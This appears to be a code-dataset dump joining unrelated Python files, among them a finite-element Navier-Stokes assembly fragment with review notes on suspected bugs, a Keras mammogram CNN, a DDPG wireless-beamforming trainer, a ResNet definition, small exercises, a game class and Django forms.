            dM[0, 2, k] = (1 + eta)/4
            dM[0, 3, k] = - (1 + eta)/4
            # NOTE(review): d(M0)/deta should presumably be -(1 - xi)/4,
            # not -(1 + eta)/4 -- confirm against the MATLAB source.
            dM[1, 0, k] = - (1 + eta)/4
            dM[1, 1, k] = -(1 + xi)/4
            dM[1, 2, k] = (1 + xi)/4
            dM[1, 3, k] = (1 - xi)/4
        for k in range(ngp):
            # Interpolated velocity at this Gauss point.
            # NOTE(review): u0[i] / v0[i] index the first 8 global DOFs for
            # every element; presumably this should be u0[celem[e, i]].
            ubar = 0
            vbar = 0
            for i in range(8):
                ubar = ubar + N[i, k] * u0[i]
                vbar = vbar + N[i, k] * v0[i]
            # Physical coordinates of the element's 8 velocity nodes
            # and 4 pressure nodes.
            coord8 = np.zeros((8, 2))
            for i in range(8):
                coord8[i, :] = node[celem[e, i], :]
            coord4 = np.zeros((4, 2))
            for i in range(4):
                coord4[i, :] = node[celem[e, i+8], :]
            # Jacobian of the 8-node mapping and gradient transformation.
            Jacob8 = np.dot(dN[:, :, k], coord8[:, :])
            detJac = abs(np.linalg.det(Jacob8))
            Jinv8 = np.linalg.inv(Jacob8)
            gdN = np.zeros((2, 8))
            for i in range(2):
                for j in range(2):
                    gdN[i, :] += Jinv8[i, j]*dN[j, :, k]
            # Reynolds number (hard-coded).
            Re = 1
            # Convection + diffusion contribution to the velocity block.
            for i in range(8):
                for j in range(8):
                    A1[i, j] = A1[i, j] + w[k] * (N[i, k] * ubar * gdN[0, j] + N[i, k] * vbar * gdN[1, j] +
                                                  (gdN[0, i] * gdN[0, j] + gdN[1, i] * gdN[1, j])/Re) * detJac
            A9 = A1.copy()
            Jacob4 = np.dot(dM[:, :, k], coord4[:, :])
            # NOTE(review): this inverts Jacob8; presumably Jacob4 was
            # intended -- confirm against the MATLAB source.
            Jinv4 = np.linalg.inv(Jacob8)
            gdM = np.zeros((2, 4))
            for i in range(2):
                for j in range(2):
                    gdM[i, :] += Jinv4[i, j]*dM[j, :, k]
            detJac4 = abs(np.linalg.det(Jacob4))
            # Pressure-gradient blocks.
            for i in range(8):
                for j in range(4):
                    A2[i, j] = A2[i, j] + w[k]*N[i, k]*gdM[0, j]*detJac4
                    A8[i, j] = A8[i, j] + w[k]*N[i, k]*gdM[1, j]*detJac4
            # Divergence (continuity) blocks.
            for i in range(4):
                for j in range(8):
                    A4[i, j] = A4[i, j] + w[k]*M[i, k]*gdN[0, j]*detJac4
                    A6[i, j] = A6[i, j] + w[k]*M[i, k]*gdN[1, j]*detJac4
# Debug marker / breakpoint anchor (placement reconstructed).
tes = 1
| clatterrr/NumericalComputation | FiniteElement/NavierStokes-satsit/demo0.py | demo0.py | py | 4,724 | python | en | code | 3 | github-code | 50 |
28418624655 | S = input()
T = input()
# Fix: the original shadowed the builtins `list` (as the candidate container)
# and used the easily-misread name `l`; behavior is unchanged.
# All strings obtainable by deleting exactly one character from S.
one_char_removed = [S[:i] + S[i + 1:] for i in range(len(S))]
# Count how many of those candidates equal T and report the count.
print(sum(1 for candidate in one_char_removed if candidate == T))
| mk668a/python_aoj | ateamTest/ateam2.py | ateam2.py | py | 154 | python | en | code | 0 | github-code | 50 |
13293220023 | import numpy
import PIL
def draw_boxes(img, boxes, digits, digit_width, digit_height):
    """Return a copy of *img* with one labelled rectangle per detection.

    Arguments
    ---------
    img : PIL.Image.Image
        Source image (left untouched; a copy is annotated).
    boxes : sequence of float
        X centre of each detected digit, in pixels.
    digits : sequence
        The digit value drawn as a text label next to each box.
    digit_width, digit_height : float
        Nominal size of one digit; boxes span digit_width horizontally and
        the full digit_height vertically (inset by 3 px).
    """
    # Fix: the module only does `import PIL`, which does not guarantee the
    # ImageDraw submodule is loaded; import it explicitly so this function
    # cannot fail with AttributeError on PIL.ImageDraw.
    from PIL import ImageDraw

    img_out = img.copy()
    draw = ImageDraw.Draw(img_out)
    for i in range(len(boxes)):
        # Random RGB outline per box so adjacent boxes are distinguishable.
        color = numpy.random.randint(0, 255, 3)
        x = boxes[i]
        draw.polygon(
            [
                (x - digit_width / 2, 3),
                (x + digit_width / 2, 3),
                (x + digit_width / 2, digit_height - 3),
                (x - digit_width / 2, digit_height - 3),
            ],
            outline=(color[0], color[1], color[2], 0),
        )
        draw.text((x - digit_width / 2 + 2, 5), str(digits[i]), fill=(0, 0, 0, 128))
    return img_out
def decode_output(confidence, box_shift, digit, position_width, positions, digit_width):
    """Greedy non-maximum suppression over per-position digit detections.

    Arguments
    ---------
    confidence : array-like of float, shape (positions,)
        Detection score per grid position; scores below 0.5 are ignored.
        Fix: the input array is no longer modified in place (the original
        zeroed the caller's array during suppression).
    box_shift : array-like of float, shape (positions,)
        Predicted centre offset in [0, 1] relative to each cell centre.
    digit : sequence
        Predicted digit per grid position.
    position_width : float
        Width of one grid cell, in pixels.
    positions : int
        Number of grid cells.
    digit_width : float
        Detections closer than digit_width / 2 to an accepted box are
        suppressed as duplicates of it.

    Returns
    -------
    (digits, boxes)
        Accepted digits and their x centres, sorted left to right; both are
        empty lists when nothing clears the threshold.
    """
    threshold = 0.5
    # Work on a float copy so the suppression below cannot clobber the
    # caller's confidence array.
    confidence = numpy.array(confidence, dtype=float)
    # Absolute x centre of the box predicted at each grid position
    # (cell centre plus a +/- position_width shift).
    digit_centres = (box_shift - 0.5) * 2 * position_width \
        + (0.5 + numpy.arange(positions)) * position_width
    kept_digits = []
    kept_boxes = []
    while True:
        best = numpy.argmax(confidence)
        if confidence[best] < threshold:
            break
        best_pos = digit_centres[best]
        kept_digits.append(digit[best])
        kept_boxes.append(best_pos)
        # Suppress every detection overlapping the accepted one.
        overlapping = numpy.where(numpy.abs(digit_centres - best_pos) < digit_width / 2)
        confidence[overlapping] = 0
    if len(kept_boxes):
        kept_boxes, kept_digits = zip(*sorted(zip(kept_boxes, kept_digits)))
    return (kept_digits, kept_boxes)
| nagos/captcha-yolo | utils.py | utils.py | py | 1,372 | python | en | code | 4 | github-code | 50 |
70579723675 | import os
import numpy as np
import threading as thr
import matplotlib.pyplot as plt
from sklearn .model_selection import train_test_split
from sklearn .metrics import roc_curve, auc
from keras.models import Sequential
from keras.layers import Conv2D, BatchNormalization, MaxPool2D, Dense, Flatten, InputLayer, Activation, Dropout
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
from tensorflow.keras.optimizers import SGD
import matlab.engine
def create_dataset(lista, o_img, f_img, labels):
    """Filter a chunk of mammogram files through MATLAB, appending results.

    Worker function run by several threads: for each "*_resized.pgm" file in
    ``lista`` it calls the MATLAB function ``dataset_filtered`` (through the
    module-level engine ``eng``) and appends the original image, the filtered
    image and a class label to the shared output lists.  ``list.append`` is
    atomic in CPython, so no extra locking is used, but the resulting order
    across threads is arbitrary.

    Arguments
    ---------
    lista : list
        Chunk of file names, resolved against the module-level ``data_folder``.
    o_img, f_img : list
        Shared output lists receiving original and filtered images.
    labels : list
        Shared output list receiving the label: 1. for "_1_" files,
        0 for "_2_" files (NOTE(review): mixed float/int; both become float
        once converted with np.asarray downstream).

    Returns
    -------
    None.  Results are appended to the three output lists in place.
    """
    for element in lista:
        if "_1_resized.pgm" in element:
            mo, mf = eng.dataset_filtered(eng.char(os.path.join(data_folder, element)), nargout = 2)
            o_img.append(mo)
            f_img.append(mf)
            labels.append(1.)
        elif "_2_resized.pgm" in element:
            mo, mf = eng.dataset_filtered(eng.char(os.path.join(data_folder, element)), nargout = 2)
            o_img.append(mo)
            f_img.append(mf)
            labels.append(0)
def cnn_o(shape=(125, 125, 1)):
    """Build the CNN that classifies the original (unfiltered) mammograms.

    Three Conv-BatchNorm-ReLU-MaxPool stages followed by a dense layer and
    a single sigmoid unit for binary classification.  (The previous
    docstring claimed this returned a filtered dataset; it actually
    returns the model, uncompiled -- the caller picks optimizer/loss.)

    Arguments
    ---------
    shape : tuple
        Input image shape as (height, width, channels).

    Returns
    -------
    keras.models.Sequential
        The uncompiled Keras model.
    """
    model = Sequential([
        Conv2D(4, (3,3), padding = 'same', input_shape = shape),
        BatchNormalization(),
        Activation('relu'),
        MaxPool2D((6,6), strides = 2),
        #Dropout(0.2),
        Conv2D(7, (3,3), padding = 'same'),
        BatchNormalization(),
        Activation('relu'),
        MaxPool2D((6,6), strides = 2),
        #Dropout(0.1),
        Conv2D(10, (3,3), padding = 'same'),
        BatchNormalization(),
        Activation('relu'),
        MaxPool2D((6,6), strides = 2),
        #Dropout(0.1),
        Flatten(),
        Dense(10, activation = 'relu'),
        #Dropout(0.1),
        Dense(1, activation = 'sigmoid')
    ])
    return model
if __name__ == '__main__':
    # Build the dataset by filtering every image through MATLAB, using a
    # pool of threads that each process a chunk of the file list.
    eng = matlab.engine.start_matlab()
    mammo_o, mammo_f, label = [], [], []
    data_folder = "C:/Users/anapascual/exam_project/dataset/"
    os.chdir(data_folder)
    l = os.listdir()
    os.chdir("C:/Users/anapascual/exam_project/")
    threads = []
    chunk = 6
    # 49 threads x 6 files each = 294 files expected in data_folder.
    for i in range(49):
        t = thr.Thread(target = create_dataset, args = (l[i*chunk : (i+1)*chunk], mammo_o, mammo_f, label))
        threads.append(t)
        t.start()
    for j in threads:
        j.join()
    eng.quit()
    # Normalize pixel values to [0, 1].
    mammo_o = np.asarray(mammo_o, dtype = 'float32')/255.
    mammo_f = np.asarray(mammo_f, dtype = 'float32')/255.
    label = np.asarray(label)
    # Add the trailing channel axis expected by Conv2D.
    mammo_o_4d = np.reshape(mammo_o, (147, 125, 125, 1))
    mammo_f_4d = np.reshape(mammo_f, (147, 64, 64, 1))
    model_o = cnn_o()
    model_o.summary()
    learning_rate = 0.001
    model_o.compile(optimizer = SGD(learning_rate, momentum = 0.9), loss = 'binary_crossentropy', metrics = ['accuracy'])
    # Shrink the learning rate when validation loss plateaus.
    reduce_on_plateau = ReduceLROnPlateau(
        monitor="val_loss",
        factor=0.1,
        patience=10,
        verbose=0,
        mode="auto",
        min_delta=0.0001,
        cooldown=0,
        min_lr=0)
    X_train_o, X_val_o, Y_train_o, Y_val_o = train_test_split(mammo_o_4d, label, test_size = 0.2, random_state = 44)
    batch_size = 21
    traino = model_o.fit(X_train_o, Y_train_o,
                         batch_size = batch_size,
                         epochs = 200,
                         verbose=1,
                         validation_data=(X_val_o, Y_val_o),
                         callbacks = [reduce_on_plateau])
    acc = traino.history['accuracy']
    val_acc = traino.history['val_accuracy']
    loss = traino.history['loss']
    val_loss = traino.history['val_loss']
    epochs_range = range(1, len(acc)+1)
    #Train and validation accuracy
    plt.figure(figsize=(15, 15))
    plt.subplot(2, 2, 1)
    plt.plot(epochs_range, acc, label='Training Accuracy')
    plt.plot(epochs_range, val_acc, label='Validation Accuracy')
    plt.legend(loc='lower right')
    plt.title('Training and Validation Accuracy')
    #Train and validation loss
    plt.subplot(2, 2, 2)
    plt.plot(epochs_range, loss, label='Training Loss')
    plt.plot(epochs_range, val_loss, label='Validation Loss')
    plt.legend(loc='upper right')
    plt.title('Training and Validation Loss')
    plt.show()
    _, val_acc = model_o.evaluate(X_val_o, Y_val_o, verbose=0)
    print('Validation accuracy: %.3f' % (val_acc))
    preds = model_o.predict(X_val_o, verbose=1)
    #Compute Receiver operating characteristic (ROC)
    fpr, tpr, _ = roc_curve(Y_val_o, preds)
    roc_auc = auc(fpr, tpr)
    #Plot of a ROC curve
    plt.figure()
    lw = 2
    plt.plot(fpr, tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
    plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel('False Positive Rate')
    plt.ylabel('True Positive Rate')
    plt.title('Receiver operating characteristic example')
    plt.legend(loc="lower right")
    plt.show()
| bitgio/CMEPDA_final_project | cnn_original.py | cnn_original.py | py | 5,367 | python | en | code | 0 | github-code | 50 |
2794402768 | import argparse
import os
import numpy as np
import torch
import DDPG
import utils
import environment
def whiten(state):
    """Standardize *state* to zero mean and unit variance.

    Uses the population standard deviation (ddof=0); a constant input
    would divide by zero, as in the original.
    """
    centered = state - np.mean(state)
    return centered / np.std(state)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Choose the type of the experiment
parser.add_argument('--experiment_type', default='custom', choices=['custom', 'power', 'rsi_elements', 'learning_rate', 'decay'],
help='Choose one of the experiment types to reproduce the learning curves given in the paper')
# Training-specific parameters
parser.add_argument("--policy", default="DDPG", help='Algorithm (default: DDPG)')
parser.add_argument("--env", default="RIS_MISO", help='OpenAI Gym environment name')
parser.add_argument("--seed", default=0, type=int, help='Seed number for PyTorch and NumPy (default: 0)')
parser.add_argument("--gpu", default="0", type=int, help='GPU ordinal for multi-GPU computers (default: 0)')
parser.add_argument("--start_time_steps", default=0, type=int, metavar='N', help='Number of exploration time steps sampling random actions (default: 0)')
parser.add_argument("--buffer_size", default=100000, type=int, help='Size of the experience replay buffer (default: 100000)')
parser.add_argument("--batch_size", default=16, metavar='N', help='Batch size (default: 16)')
parser.add_argument("--save_model", action="store_true", help='Save model and optimizer parameters')
parser.add_argument("--load_model", default="", help='Model load file name; if empty, does not load')
# Environment-specific parameters
parser.add_argument("--num_antennas", default=4, type=int, metavar='N', help='Number of antennas in the BS')
parser.add_argument("--num_RIS_elements", default=4, type=int, metavar='N', help='Number of RIS elements')
parser.add_argument("--num_users", default=4, type=int, metavar='N', help='Number of users')
parser.add_argument("--power_t", default=30, type=float, metavar='N', help='Transmission power for the constrained optimization in dB')
parser.add_argument("--num_time_steps_per_eps", default=10000, type=int, metavar='N', help='Maximum number of steps per episode (default: 20000)')
parser.add_argument("--num_eps", default=10, type=int, metavar='N', help='Maximum number of episodes (default: 5000)')
parser.add_argument("--awgn_var", default=1e-2, type=float, metavar='G', help='Variance of the additive white Gaussian noise (default: 0.01)')
parser.add_argument("--channel_est_error", default=False, type=bool, help='Noisy channel estimate? (default: False)')
# Algorithm-specific parameters
parser.add_argument("--exploration_noise", default=0.0, metavar='G', help='Std of Gaussian exploration noise')
parser.add_argument("--discount", default=0.99, metavar='G', help='Discount factor for reward (default: 0.99)')
parser.add_argument("--tau", default=1e-3, type=float, metavar='G', help='Learning rate in soft/hard updates of the target networks (default: 0.001)')
parser.add_argument("--lr", default=1e-3, type=float, metavar='G', help='Learning rate for the networks (default: 0.001)')
parser.add_argument("--decay", default=1e-5, type=float, metavar='G', help='Decay rate for the networks (default: 0.00001)')
args = parser.parse_args()
print("---------------------------------------")
print(f"Policy: {args.policy}, Env: {args.env}, Seed: {args.seed}")
print("---------------------------------------")
file_name = f"{args.num_antennas}_{args.num_RIS_elements}_{args.num_users}_{args.power_t}_{args.lr}_{args.decay}"
if not os.path.exists(f"./Learning Curves/{args.experiment_type}"):
os.makedirs(f"./Learning Curves/{args.experiment_type}")
if args.save_model and not os.path.exists("./Models"):
os.makedirs("./Models")
env = environment.RIS_MISO(args.num_antennas, args.num_RIS_elements, args.num_users, AWGN_var=args.awgn_var)
# Set seeds
torch.manual_seed(args.seed)
np.random.seed(args.seed)
state_dim = env.state_dim
action_dim = env.action_dim
max_action = 1
device = torch.device(f"cuda:{args.gpu}" if torch.cuda.is_available() else "cpu")
kwargs = {
"state_dim": state_dim,
"action_dim": action_dim,
"power_t": args.power_t,
"max_action": max_action,
"M": args.num_antennas,
"N": args.num_RIS_elements,
"K": args.num_users,
"actor_lr": args.lr,
"critic_lr": args.lr,
"actor_decay": args.decay,
"critic_decay": args.decay,
"device": device,
"discount": args.discount,
"tau": args.tau
}
# Initialize the algorithm
agent = DDPG.DDPG(**kwargs)
if args.load_model != "":
policy_file = file_name if args.load_model == "default" else args.load_model
agent.load(f"./models/{policy_file}")
replay_buffer = utils.ExperienceReplayBuffer(state_dim, action_dim, max_size=args.buffer_size)
# Initialize the instant rewards recording array
instant_rewards = []
max_reward = 0
for eps in range(int(args.num_eps)):
state, done = env.reset(), False
episode_reward = 0
episode_num = 0
episode_time_steps = 0
state = whiten(state)
eps_rewards = []
for t in range(int(args.num_time_steps_per_eps)):
# Choose action from the policy
action = agent.select_action(np.array(state))
# Take the selected action
next_state, reward, done, _ = env.step(action)
done = 1.0 if t == args.num_time_steps_per_eps - 1 else float(done)
# Store data in the experience replay buffer
replay_buffer.add(state, action, next_state, reward, done)
state = next_state
episode_reward += reward
state = whiten(state)
if reward > max_reward:
max_reward = reward
# Train the agent
agent.update_parameters(replay_buffer, args.batch_size)
print(f"Time step: {t + 1} Episode Num: {episode_num + 1} Reward: {reward:.3f}")
eps_rewards.append(reward)
episode_time_steps += 1
if done:
print(f"\nTotal T: {t + 1} Episode Num: {episode_num + 1} Episode T: {episode_time_steps} Max. Reward: {max_reward:.3f}\n")
# Reset the environment
state, done = env.reset(), False
episode_reward = 0
episode_time_steps = 0
episode_num += 1
state = whiten(state)
instant_rewards.append(eps_rewards)
np.save(f"./Learning Curves/{args.experiment_type}/{file_name}_episode_{episode_num + 1}", instant_rewards)
if args.save_model:
agent.save(f"./Models/{file_name}")
| baturaysaglam/RIS-MISO-Deep-Reinforcement-Learning | main.py | main.py | py | 6,892 | python | en | code | 77 | github-code | 50 |
29943658246 | import torch
from torch import nn
from torch.nn import functional as F
class Residual(nn.Module):
    """ResNet basic residual block: two 3x3 convolutions with batch
    normalization and a skip connection.

    Args:
        input_channels: channels of the incoming feature map.
        num_channels: channels produced by both convolutions.
        use_1x1conv: if True, project the input with a 1x1 convolution so
            its shape matches the residual branch (needed whenever the
            channel count or stride changes).
        padding: padding of the first 3x3 convolution.  Fix: this
            parameter was accepted but ignored (the first conv hard-coded
            padding=1); it is now honored, with the default preserving the
            original behavior.
        strides: stride of the first convolution (and of the 1x1
            projection), used for downsampling.
    """

    def __init__(self, input_channels, num_channels, use_1x1conv=False, padding=1, strides=1):
        super().__init__()
        self.conv1 = nn.Conv2d(input_channels, num_channels, kernel_size=3,
                               stride=strides, padding=padding)
        self.conv2 = nn.Conv2d(num_channels, num_channels, kernel_size=3, padding=1)
        if use_1x1conv:
            self.conv3 = nn.Conv2d(input_channels, num_channels, kernel_size=1, stride=strides)
        else:
            self.conv3 = None
        self.bn1 = nn.BatchNorm2d(num_channels)
        self.bn2 = nn.BatchNorm2d(num_channels)

    def forward(self, x):
        y = F.relu(self.bn1(self.conv1(x)))
        y = self.bn2(self.conv2(y))
        if self.conv3:
            x = self.conv3(x)
        # This is the skip connection: add the (possibly projected) input.
        y += x
        return F.relu(y)
def resnet_block(input_channels, num_channels, num_residuals, first_block=False):
    """Build the list of residual units for one ResNet stage.

    Every stage except the first starts with a down-sampling unit (stride 2,
    1x1 projection on the skip); the remaining units keep shape.
    """
    units = []
    for idx in range(num_residuals):
        downsample = (idx == 0) and not first_block
        if downsample:
            units.append(Residual(input_channels, num_channels, use_1x1conv=True, strides=2))
        else:
            units.append(Residual(num_channels, num_channels))
    return units
# Stem: 7x7 conv (1 -> 64 channels) + BN + ReLU, then a 3x3 max-pool;
# each stride-2 op halves the spatial resolution.
b1 = nn.Sequential(
    nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3),
    nn.BatchNorm2d(64), nn.ReLU(),
    nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
)
# Four residual stages, two units each (ResNet-18 layout); every stage after
# the first doubles the channels and halves the resolution.
b2 = nn.Sequential(
    nn.Sequential(*resnet_block(64, 64, 2, first_block=True)),
    nn.Sequential(*resnet_block(64, 128, 2)),
    nn.Sequential(*resnet_block(128, 256, 2)),
    nn.Sequential(*resnet_block(256, 512, 2))
)
# Full network: stem + stages + global average pooling + 10-way linear head.
resnet = nn.Sequential(
    b1, b2,
    nn.AdaptiveAvgPool2d((1, 1)),
    nn.Flatten(), nn.Linear(512, 10)
)
def shape_evolution():
    """Push a dummy 1x1x512x512 input through `resnet`, printing each
    top-level layer's name and output shape."""
    activation = torch.randn((1, 1, 512, 512))
    for module in resnet:
        activation = module(activation)
        print(module.__class__.__name__, 'output shape:\t', activation.shape)
def main():
    # Entry point: print how the tensor shape evolves through the network.
    shape_evolution()


if __name__ == "__main__":
    main()
| Arni14/Deep-Learning | modern_architectures/resnet.py | resnet.py | py | 2,032 | python | en | code | 0 | github-code | 50 |
70782323675 | # Samuel Hulme
# Cracking the Coding Interview
# Question 1.1
#
# Implement an algorithm to determine if a string has all unique characters. What if you cannot use additional data structures?
#
# Thoughts:
# To implement this, we can use a dictionary. To do this, iterate through the list and then insert the characters into
# a dictionary. If an element already exists for that string, we know that it is has been accessed twice.
# Using a dictionary, which is a hashmap, we can almost always check for items in O(1), add in O(1). It will take O(n)
# to go through the list.
#
# contains_duplicates_dict(str)
# Go through the string and check if the character is already in the dictionary. If so, there are duplicates. If
# not, add to dict and continue. Using a dictionary, which is a hashmap, we can almost always check for items in
# O(1), add in O(1). It will take O(n) to go through the list.
#
# Pros: Quick. Runs in O(n) without lots of memory usage in the typical case.
#
# contains_duplicates_bf(str)
# This is the for the case where we cannot use additional data structures. In this case, we can brute force it and
# compare each character to every other. This takes O(n^2).
#
# contains_duplicates_sort(str)
# No data structures again. This time, sort the list and then go up through it. This is O(nlogn + n) = O(nlogn)
#
#
# Sample inputs and result strings for the demo calls further down in the file.
string_with_duplicates = "Hello there young lad!"
string_no_duplicates = "abcdefg"
dup_exist = "Duplicates exist"
no_dup = "No duplicates"
def contains_duplicates_dict(str):  # O(n)
    """Return True when any character occurs more than once, using a hash map
    so the scan bails out on the first repeat."""
    seen = {}
    for ch in str:
        if ch in seen:
            return True
        seen[ch] = 1
    return False
def contains_duplicates_bf(str):  # O(n^2)
    """Brute force, no extra data structures: compare each character against
    every later one (starting at i + 1 makes the i != j guard unnecessary)."""
    length = len(str)
    for i in range(length):
        for j in range(i + 1, length):
            if str[i] == str[j]:
                return True
    return False
def contains_duplicates_sort(str):  # O(nlogn + n) = O(nlogn)
    """Sort the characters, then look for an equal adjacent pair."""
    ordered = sorted(str)
    for prev, cur in zip(ordered, ordered[1:]):
        if prev == cur:
            return True
    return False
def test_for_duplicates(type):
    """Prompt for a string and report whether it has duplicate characters.

    type selects the algorithm: "D" (dictionary), "BF" (brute force) or
    "S" (sort). Any other value leaves duplicates_exist False, so it reports
    "do NOT exist". NOTE: the parameter shadows the builtin `type`.
    """
    test_string = input("Enter a string: ")
    duplicates_exist = False
    if type == "D": # Dictionary
        duplicates_exist = contains_duplicates_dict(test_string)
    if type == "BF": # Brute Force
        duplicates_exist = contains_duplicates_bf(test_string)
    if type == "S": # Sorted
        duplicates_exist = contains_duplicates_sort(test_string)
    print("\nDuplicate characters DO exist" if duplicates_exist else "\nDuplicate characters do NOT exist")
#print("\nUsing a dictionary:")
#test_for_duplicates("D", string_with_duplicates)
#test_for_duplicates("D", string_no_duplicates)
#print("\nUsing a brute force approach:")
#test_for_duplicates("BF", string_with_duplicates)
#test_for_duplicates("BF", string_no_duplicates)
#print("\nSorting then iterating:")
#test_for_duplicates("S", string_with_duplicates)
#test_for_duplicates("S", string_no_duplicates)
# Interactive entry point: describe the program, then loop until the user
# picks a valid algorithm (1-3) and run the corresponding duplicate check.
print("\n\nThis program will take a string and determine if there are duplicate characters in the string ")
print("There are three different algorithms available to do this. Choose an algorithm from the following by entering 1, 2, or 3.")
print("    1.) Using A Dictionary - O(n)")
print("    2.) Using A Brute Force Approach - O(n^2)")
print("    3.) Sorting Than Iterating - O(nlogn)")
bad_answer = True
while bad_answer:
    answer = input("\nSelect an algorithm by typing 1, 2, or 3: ")
    if answer == "1":
        bad_answer = False
        test_for_duplicates("D") #Dictionary
    elif answer == "2":
        bad_answer = False
        test_for_duplicates("BF") #Brute Force
    elif answer == "3":
        bad_answer = False
        test_for_duplicates("S") #Sorting
| shulme33/Programming | Python/cci_1-1.py | cci_1-1.py | py | 3,889 | python | en | code | 0 | github-code | 50 |
39210745835 | from ui_elements import Text, Picture
from config import *
import pygame
import random
class SystemFish:
    """Fishing minigame state machine.

    While the player holds the left mouse button ("fishing"), a tick counter
    runs; after a random delay a bite alert is shown for a short window, and
    releasing the button during that window counts as a catch.

    NOTE(review): timer/delay/opportunity are counted in update ticks — the
    `* 60` factors in randomize() look like a 60 FPS assumption; confirm.
    """
    def __init__(self):
        self.timer = 0            # ticks the button has been held this attempt
        self.exists = False       # True while a fish is currently biting
        self.delay = None         # ticks to hold before a bite appears
        self.opportunity = None   # ticks the bite remains catchable
        self.fish_counter = None  # Text widget showing the current catch count
        self.randomize()
        self.fish_alert = Picture('img/Zap.png', 800, 450, 4)
    def __call__(self, screen, left_click):
        """Advance one frame: draw the counter, track the hold, show the bite
        alert, and register catches/misses."""
        # Fish counter
        self.fish_counter(screen)
        # Increase timer if user is fishing.
        if left_click:
            self.timer += 1
        else:
            self.timer = 0
        # If the timer passes the delay (Fish appears!)
        if self.timer > self.delay:
            if left_click:
                self.fish_alert(screen, 255)
                self.exists = True
        # If the user misses the fish
        if self.timer > self.delay + self.opportunity:
            self.randomize()
        # Catch! (button released while a fish was biting)
        if self.exists and left_click == False:
            Config.data['FISH_COUNT'] += 1
            self.randomize()
    def randomize(self):
        """Reset the attempt and roll a fresh delay/opportunity window."""
        self.timer = 0
        self.exists = False
        # 5 20
        self.delay = random.uniform(1.5, 6) * 60
        self.opportunity = random.uniform(0.5, 1) * 60
        # Update fish counter
        self.fish_counter = Text(f"Fish: {str(Config.data['FISH_COUNT'])}", 200, 100, 'Blue', 'pristina', 120)
| Archkitten/CS-AP-2 | p2/flyby_fishing/system_fish.py | system_fish.py | py | 1,399 | python | en | code | 0 | github-code | 50 |
12520662785 | # -*- coding: utf-8 -*-
from django import forms
from django.conf import settings
from django.utils.encoding import force_str
from django.utils import timezone, dateparse
from django.utils.translation import gettext as _
from core import models
# Moves a 'child' form kwarg into initial data for new (non-edit) forms.
def set_default_child(kwargs):
    """Seed ``initial['child']`` from a ``child`` kwarg.

    The 'child' key is always removed so it never reaches the Form
    constructor; it is only applied when no instance is being edited.
    """
    if not kwargs.get('initial'):
        kwargs['initial'] = {}
    child = kwargs.pop('child', None)
    editing = kwargs.get('instance') is not None
    if child is not None and not editing:
        kwargs['initial']['child'] = child
    return kwargs
# Uses a timer to set the default start and end date and updates the timer.
def set_default_duration(kwargs):
    """Seed initial start/end (and the timer itself) from a ``timer`` kwarg.

    When no model instance is being edited and a timer id is supplied, the
    timer's start becomes the default start and its end (or "now") the
    default end. The 'timer' key is always removed so it never reaches the
    Form constructor.
    """
    instance = kwargs.get('instance', None)
    timer_id = kwargs.get('timer', None)
    if not kwargs.get('initial'):
        kwargs.update(initial={})
    if not instance and timer_id:
        # Re-purposes `instance` to hold the Timer object (not the form's
        # model instance) for the initial-data dict below.
        instance = models.Timer.objects.get(id=timer_id)
        kwargs['initial'].update({
            'timer': instance,
            'start': instance.start,
            'end': instance.end or timezone.now()
        })
    # Drop the 'timer' key whether or not it was present.
    try:
        kwargs.pop('timer')
    except KeyError:
        pass
    return kwargs
def user_children_queryset(user):
    """Queryset of every Child belonging to any of the user's accounts."""
    accounts = user.accounts.all()
    return models.Child.objects.filter(account__in=accounts)
def set_common_select_fields_empty_values(form):
    """Blank the placeholder label of the common select fields when present."""
    for field_name in ('child', 'account'):
        field = form.fields.get(field_name)
        if field is not None:
            field.empty_label = ""
# Sets the default Feeding type to the one used in the most recent entry.
def set_default_feeding_type(kwargs):
    """Default ``initial['type']`` to the latest feeding's type for new forms."""
    if not kwargs.get('initial'):
        kwargs['initial'] = {}
    adding = kwargs.get('instance') is None
    if adding and models.Feeding.objects.count() > 0:
        kwargs['initial']['type'] = models.Feeding.objects.latest('end').type
    return kwargs
class ChildForm(forms.ModelForm):
    """Add/edit form for a Child.

    The picture field is only offered when uploads are enabled; note the
    settings check runs once, at import time.
    """
    class Meta:
        model = models.Child
        fields = [
            'first_name',
            'last_name',
            'birth_date'
        ]
        # Only expose the upload field when the deployment allows uploads.
        if settings.BABY_BUDDY['ALLOW_UPLOADS']:
            fields.append('picture')
        widgets = {
            'birth_date': forms.DateInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_date',
            }),
        }
class ChildDeleteForm(forms.ModelForm):
    """Deletion confirmation form: the user must type the child's full name."""
    confirm_name = forms.CharField(max_length=511)

    class Meta:
        model = models.Child
        fields = []

    def clean_confirm_name(self):
        """Validate that the typed name matches str(instance) exactly."""
        typed = self.cleaned_data['confirm_name']
        if typed == str(self.instance):
            return typed
        raise forms.ValidationError(
            _('Name does not match child name.'), code='confirm_mismatch')

    def save(self, commit=True):
        """Delete the child and return the (now deleted) instance."""
        deleted = self.instance
        deleted.delete()
        return deleted
class BathForm(forms.ModelForm):
    """Add/edit form for a Bath; the child is carried in a hidden field."""

    class Meta:
        model = models.Bath
        fields = ['time', 'child']
        widgets = {
            'child': forms.HiddenInput(),
            'time': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_time',
            }),
        }

    def __init__(self, *args, **kwargs):
        """Pre-populate the child from a 'child' kwarg when adding."""
        super().__init__(*args, **set_default_child(kwargs))
class DiaperChangeForm(forms.ModelForm):
    """Add/edit form for a DiaperChange; the child is carried in a hidden field."""

    class Meta:
        model = models.DiaperChange
        fields = ['time', 'wet', 'solid', 'color', 'child']
        widgets = {
            'child': forms.HiddenInput(),
            'time': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_time',
            }),
        }

    def __init__(self, *args, **kwargs):
        """Pre-populate the child from a 'child' kwarg when adding."""
        super().__init__(*args, **set_default_child(kwargs))
class FeedingForm(forms.ModelForm):
    """Add/edit form for a Feeding, optionally driven by a running Timer."""

    class Meta:
        model = models.Feeding
        fields = ['start', 'end', 'type', 'method', 'amount', 'child']
        widgets = {
            'child': forms.HiddenInput(),
